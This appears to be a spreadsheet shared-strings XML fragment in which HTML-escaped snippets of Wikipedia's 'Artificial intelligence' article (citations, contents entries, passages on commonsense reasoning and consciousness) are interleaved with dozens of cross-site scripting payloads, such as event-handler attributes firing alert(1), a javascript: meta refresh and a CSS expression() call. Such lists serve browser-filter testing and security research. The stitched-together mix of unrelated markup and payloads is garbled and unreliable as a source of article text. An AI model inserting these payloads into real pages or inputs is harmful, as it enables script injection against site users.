    <t xml:space="preserve">&lt;li id="cite_note-Kernel_methods-225"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Kernel_methods_225-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;small onpointerout=alert(1)&gt;XSS&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;abbr style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Rawlinson, Kevin (29 January 2015). &lt;a rel="nofollow" class="external text" href="https://www.bbc.co.uk/news/31047780"&gt;"Microsoft's Bill Gates insists AI is a threat" &lt;/a&gt;. &lt;i&gt;BBC News &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20150129183607/http://www.bbc.co.uk/news/31047780"&gt;Archived &lt;/a&gt; from the original on 29 January 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 January </t>
  </si>
  <si>
    <t>&lt;noframes oncopy="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;keygen autofocus onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;form onpointerup=alert(1)&gt;XSS&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Machine consciousness, sentience and mind </t>
  </si>
  <si>
    <t>&lt;template onmouseenter="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;47–49, who writes "the conference is generally recognized as the official birthdate of the new science." &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;source oncontextmenu="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;a draggable="true" ondrag="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Competitive_learning" title="Competitive learning"&gt;Competitive learning &lt;/a&gt;, &lt;a href="/wiki/Hebbian_theory" title="Hebbian theory"&gt;Hebbian &lt;/a&gt; coincidence learning, &lt;a href="/wiki/Hopfield_network" title="Hopfield network"&gt;Hopfield networks &lt;/a&gt; and attractor networks:</t>
  </si>
  <si>
    <t>&lt;td oncopy="alert(1)" contenteditable&gt;test&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;table onclick="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;command onbeforecut="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onmousemove="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Fusion.net&amp;amp;rft.atitle=The+case+against+killer+robots%2C+from+a+guy+actually+working+on+artificial+intelligence&amp;amp;rft_id=http%3A%2F%2Ffusion.net%2Fstory%2F54583%2Fthe-case-against-killer-robots-from-a-guy-actually-building-ai%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;samp id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;meta content="&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)" http-equiv="refresh"/&gt;</t>
  </si>
  <si>
    <t>&lt;td id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/td&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onpointerenter=alert(1)&gt;XSS&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;frameset draggable="true" ondragend="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=72" title="Edit section: References"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;rb id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/rb&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Nature_(philosophy)" title="Nature (philosophy)"&gt;Nature &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;input3 onpointermove=alert(1)&gt;XSS&lt;/input3&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Functional_contextualism" title="Functional contextualism"&gt;Functional contextualism &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;em onmousemove="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;var onmousemove="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;tt onmousemove="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>expression(alert(''))</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-314"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-314"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;wbr onmousemove="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;s onbeforecopy="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;link onpointerup=alert(1)&gt;XSS&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;dl onblur=alert(1) tabindex=1 id=x&gt;&lt;/dl&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;address onmouseout="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;listing id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFLungarellaMettaPfeiferSandini2003"&gt;Lungarella et al. 2003 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;tbody onclick="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Existential_risk_from_artificial_general_intelligence" title="Existential risk from artificial general intelligence"&gt;Existential risk &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;In the long run, social skills and an understanding of human emotion and &lt;a href="/wiki/Game_theory" title="Game theory"&gt;game theory &lt;/a&gt; would be valuable to a social agent. Being able to predict the actions of others by understanding their motives and emotional states would allow an agent to make better decisions. Some computer systems mimic human emotion and expressions to appear more sensitive to the emotional dynamics of human interaction, or to otherwise facilitate &lt;a href="/wiki/Human%E2%80%93computer_interaction" title="Human–computer interaction"&gt;human–computer interaction &lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;input3 onpointerdown=alert(1)&gt;XSS&lt;/input3&gt;</t>
  </si>
  <si>
    <t>&lt;dd onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/dd&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;figure onmousedown="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;footer id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;dt&gt;Downloads&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-places-cookiestatement"&gt;&lt;a href="https://foundation.wikimedia.org/wiki/Cookie_statement"&gt;Cookie statement &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onkeypress="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/tbody&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul onmousemove="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;option onpointerenter=alert(1)&gt;XSS&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onmouseup="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-143"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-143"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dl onpointerdown=alert(1)&gt;XSS&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;command oncopy="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onpointerup=alert(1)&gt;XSS&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;rt onkeydown="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;239–243 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Compared with humans, existing AI lacks several features of human "&lt;a href="/wiki/Commonsense_reasoning" title="Commonsense reasoning"&gt;commonsense reasoning &lt;/a&gt;"; most notably, humans have powerful mechanisms for reasoning about "&lt;a href="/wiki/Na%C3%AFve_physics" title="Naïve physics"&gt;naïve physics &lt;/a&gt;" s"&lt;a href="/wiki/Folk_psychology" title="Folk psychology"&gt;folk psychology &lt;/a&gt;" that helps them to interpret natural-language sentences such as "The city councilmen refused the demonstrators a permit because they advocated violence". (A generic AI has difficulty discerning whether the ones alleged to be advocating violence are the councilmen or the demonstrators.)&lt;sup id="cite_ref-81" class="reference"&gt;&lt;a href="#cite_note-81"&gt;&amp;#91;78&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-82" class="reference"&gt;&lt;a href="#cite_note-82"&gt;&amp;#91;79&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-83" class="reference"&gt;&lt;a href="#cite_note-83"&gt;&amp;#91;80&amp;#93; &lt;/a&gt; &lt;/sup&gt; This lack of "common knowledge" means that AI often makes different mistakes than humans make, in ways that can seem incomprehensible. For example, existing self-driving cars cannot reason about the location nor the intentions of pedestrians in the exact way that humans do, and instead must use non-human modes of reasoning to avoid accidents.&lt;sup id="cite_ref-84" class="reference"&gt;&lt;a href="#cite_note-84"&gt;&amp;#91;81&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-85" class="reference"&gt;&lt;a href="#cite_note-85"&gt;&amp;#91;82&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-86" class="reference"&gt;&lt;a href="#cite_note-86"&gt;&amp;#91;83&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;acronym style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>Discussion:</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;For example, consider what happens when a person is shown a color swatch and identifies it, saying "it's red". The easy problem only requires understanding the machinery in the brain that makes it possible for a person to know that the color swatch is red. The hard problem is that people also know something else—they also know &lt;i&gt;what red looks like &lt;/i&gt;. (Consider that a person born blind can know that something is red without knowing what red looks like.)&lt;sup id="cite_ref-402" class="reference"&gt;&lt;a href="#cite_note-402"&gt;&amp;#91;l&amp;#93; &lt;/a&gt; &lt;/sup&gt; Everyone knows subjective experience exists, because they do it every day (e.g., all sighted people know what red looks like). The hard problem is explaining how the brain creates it, why it exists, and how it is different from knowledge and other aspects of the brain.</t>
  </si>
  <si>
    <t>&lt;picture id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_information" title="Philosophy of information"&gt;Information &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onclick="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;blink onbeforecut="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;param draggable="true" ondragstart="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;select oncopy="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;keygen onmouseenter="alert(1)"&gt;test&lt;/keygen&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-scholarpedia-249"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-scholarpedia_249-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;video onloadeddata=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;sub onpointerdown=alert(1)&gt;XSS&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;shadow id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;textarea oncut=alert(1) autofocus&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFNewellSimon1976" class="citation journal"&gt;&lt;a href="/wiki/Allen_Newell" title="Allen Newell"&gt;Newell, Allen &lt;/a&gt;; &lt;a href="/wiki/Herbert_A._Simon" title="Herbert A. Simon"&gt;Simon, H. A. &lt;/a&gt; (1976). &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20081007162810/http://www.rci.rutgers.edu/~cfs/472_html/AI_SEARCH/PSS/PSSH4.html"&gt;"Computer Science as Empirical Inquiry: Symbols and Search" &lt;/a&gt;. &lt;i&gt;Communications of the ACM &lt;/i&gt;. &lt;b&gt;19 &lt;/b&gt; (3): 113–126. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1145%2F360018.360022"&gt;10.1145/360018.360022 &lt;/a&gt;. Archived from &lt;a rel="nofollow" class="external text" href="http://www.rci.rutgers.edu/~cfs/472_html/AI_SEARCH/PSS/PSSH4.html"&gt;the original &lt;/a&gt; on 7 October 2008. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Communications+of+the+ACM&amp;amp;rft.atitle=Computer+Science+as+Empirical+Inquiry%3A+Symbols+and+Search&amp;amp;rft.volume=19&amp;amp;rft.issue=3&amp;amp;rft.pages=113-126&amp;amp;rft.date=1976&amp;amp;rft_id=info%3Adoi%2F10.1145%2F360018.360022&amp;amp;rft.aulast=Newell&amp;amp;rft.aufirst=Allen&amp;amp;rft.au=Simon%2C+H.+A.&amp;amp;rft_id=http%3A%2F%2Fwww.rci.rutgers.edu%2F~cfs%2F472_html%2FAI_SEARCH%2FPSS%2FPSSH4.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;footer id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/footer&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Edward_Fredkin" title="Edward Fredkin"&gt;Edward Fredkin &lt;/a&gt; argues that "artificial intelligence is the next stage in evolution", an idea first proposed by &lt;a href="/wiki/Samuel_Butler_(novelist)" title="Samuel Butler (novelist)"&gt;Samuel Butler &lt;/a&gt;'s "&lt;a href="/wiki/Darwin_among_the_Machines" title="Darwin among the Machines"&gt;Darwin among the Machines &lt;/a&gt;" as far back as 1863, and expanded upon by &lt;a href="/wiki/George_Dyson_(science_historian)" title="George Dyson (science historian)"&gt;George Dyson &lt;/a&gt; in his book of the same name in 1998.&lt;sup id="cite_ref-AI_as_evolution_412-0" class="reference"&gt;&lt;a href="#cite_note-AI_as_evolution-412"&gt;&amp;#91;400&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-281"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-281"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;multicol onpointermove=alert(1)&gt;XSS&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;pre onmousedown="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;s onpointerover=alert(1)&gt;XSS&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;div style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson (1998 &lt;/a&gt;, chpt. 25) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;link onmouseout="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;tbody style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://nextbigwhat.com/ai-traffic-signals-to-be-installed-in-bengaluru-soon/"&gt;"AI traffic signals to be installed in Bengaluru soon" &lt;/a&gt;. &lt;i&gt;NextBigWhat &lt;/i&gt;. 24 September 2019&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;1 October </t>
  </si>
  <si>
    <t>&lt;ruby id=x tabindex=1 onfocus=alert(1)&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;rp style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPenrose1989"&gt;Penrose 1989 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>URL=javascript:alert('')</t>
  </si>
  <si>
    <t>&lt;b oncopy="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;dir onmousemove="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onkeydown="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://www-formal.stanford.edu/jmc/whatisai/node3.html"&gt;"Applications of AI" &lt;/a&gt;. &lt;i&gt;www-formal.stanford.edu &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;25 September </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Lieto, Antonio (May 2018). "The knowledge level in cognitive architectures: Current limitations and possible developments". &lt;i&gt;Cognitive Systems Research &lt;/i&gt;. &lt;b&gt;48 &lt;/b&gt;: 39–55. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.cogsys.2017.05.001"&gt;10.1016/j.cogsys.2017.05.001 &lt;/a&gt;. &lt;a href="/wiki/Handle_System" title="Handle System"&gt;hdl &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="//hdl.handle.net/2318%2F1665207"&gt;2318/1665207 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Cognitive+Systems+Research&amp;amp;rft.atitle=The+knowledge+level+in+cognitive+architectures%3A+Current+limitations+and+possible+developments&amp;amp;rft.volume=48&amp;amp;rft.pages=39-55&amp;amp;rft.date=2018-05&amp;amp;rft_id=info%3Ahdl%2F2318%2F1665207&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.cogsys.2017.05.001&amp;amp;rft.aulast=Lieto&amp;amp;rft.aufirst=Antonio&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;aside id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/aside&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;&lt;a href="/wiki/David_Chalmers" title="David Chalmers"&gt;Chalmers, David &lt;/a&gt; (1995). &lt;a rel="nofollow" class="external text" href="http://www.imprint.co.uk/chalmers.html"&gt;"Facing up to the problem of consciousness" &lt;/a&gt;. &lt;i&gt;&lt;a href="/wiki/Journal_of_Consciousness_Studies" title="Journal of Consciousness Studies"&gt;Journal of Consciousness Studies &lt;/a&gt; &lt;/i&gt;. &lt;b&gt;2 &lt;/b&gt; (3): 200–219. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Journal+of+Consciousness+Studies&amp;amp;rft.atitle=Facing+up+to+the+problem+of+consciousness&amp;amp;rft.volume=2&amp;amp;rft.issue=3&amp;amp;rft.pages=200-219&amp;amp;rft.date=1995&amp;amp;rft.aulast=Chalmers&amp;amp;rft.aufirst=David&amp;amp;rft_id=http%3A%2F%2Fwww.imprint.co.uk%2Fchalmers.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;map onpointerup=alert(1)&gt;XSS&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;tt id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;a href="#CITEREFHaugeland1985"&gt;Haugeland 1985 &lt;/a&gt;, pp.&amp;#160;112–117 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=latimes.com&amp;amp;rft.atitle=Impact+of+Artificial+Intelligence+on+Banking&amp;amp;rft.date=1990-01-17&amp;amp;rft.aulast=Christy&amp;amp;rft.aufirst=Charles+A.&amp;amp;rft_id=https%3A%2F%2Fwww.latimes.com%2Farchives%2Fla-xpm-1990-01-17-fi-233-story.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;video ondblclick="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;progress id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t>Representing events and time:&lt;a href="/wiki/Situation_calculus" title="Situation calculus"&gt;Situation calculus &lt;/a&gt;, &lt;a href="/wiki/Event_calculus" title="Event calculus"&gt;event calculus &lt;/a&gt;, &lt;a href="/wiki/Fluent_calculus" title="Fluent calculus"&gt;fluent calculus &lt;/a&gt; (including solving the &lt;a href="/wiki/Frame_problem" title="Frame problem"&gt;frame problem &lt;/a&gt;):</t>
  </si>
  <si>
    <t>&lt;track onpaste="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;image onmouseleave="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;title id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-30"&gt;&lt;a href="#Classifiers_and_statistical_learning_methods"&gt;&lt;span class="tocnumber"&gt;6.4 </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;label for="searchInput"&gt;Search &lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;audio onpointerover=alert(1)&gt;XSS&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;isindex style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;style onmouseup="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE TYPE="text/javascript"&gt;alert('');&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Computationalism_and_functionalism"&gt;Computationalism and functionalism </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Naturalism_(philosophy)" title="Naturalism (philosophy)"&gt;Naturalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ontology_(information_science)" title="Ontology (information science)"&gt;Ontology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;audio onbeforecopy="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>¼script¾alert(¢¢)¼/script¾</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;blockquote style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;nav onmouseover="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Recurrent_neural_networks" class="mw-redirect" title="Recurrent neural networks"&gt;Recurrent neural networks &lt;/a&gt;, &lt;a href="/wiki/Hopfield_nets" class="mw-redirect" title="Hopfield nets"&gt;Hopfield nets &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;ul id=x tabindex=1 onfocus=alert(1)&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-McCorduck&amp;#39;s_thesis-21"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-McCorduck&amp;#39;s_thesis_21-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-McCorduck&amp;#39;s_thesis_21-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFAlbus2002"&gt;Albus 2002 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;img draggable="true" ondragend="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onbeforecopy="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;label ondblclick="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;code onmouseenter="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;big onblur=alert(1) tabindex=1 id=x&gt;&lt;/big&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
